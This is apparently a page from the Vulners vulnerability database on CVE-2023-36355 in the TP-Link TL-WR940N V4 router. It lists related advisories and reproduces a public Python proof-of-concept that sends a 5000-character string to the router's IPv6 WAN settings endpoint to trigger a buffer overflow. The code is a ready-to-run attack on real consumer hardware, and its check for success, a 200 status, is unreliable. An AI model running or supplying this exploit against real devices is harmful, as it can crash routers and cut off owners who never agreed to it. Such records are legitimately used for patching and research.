| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| TP-Link TL-WR940N V4 - Buffer OverFlow Exploit | 4 Jul 202300:00 | – | zdt | |
| CVE-2023-36355 | 22 Jun 202320:15 | – | attackerkb | |
| TP-Link TL-WR940N 安全漏洞 | 22 Jun 202300:00 | – | cnnvd | |
| CVE-2023-36355 | 22 Jun 202300:00 | – | cve | |
| CVE-2023-36355 | 22 Jun 202300:00 | – | cvelist | |
| TP-Link TL-WR940N V4 - Buffer OverFlow | 3 Jul 202300:00 | – | exploitdb | |
| CVE-2023-36355 | 22 Jun 202320:15 | – | nvd | |
| Buffer overflow | 22 Jun 202320:15 | – | prion | |
| PT-2023-3441 · Tp Link · Tp-Link Tl-Wr940N | 20 Jun 202300:00 | – | ptsecurity | |
| CVE-2023-36355 | 22 Jun 202300:00 | – | vulnrichment |
`# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355
import requests
# Replace the IP address with the router's IP
router_ip = '192.168.0.1'
# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='
# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000 # Example payload, adjust the length as needed
# Send the GET request with the crafted payload
response = requests.get(url + payload)
# Check the response status code
if response.status_code == 200:
print('Buffer overflow triggered successfully')
else:
print('Buffer overflow not triggered')
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation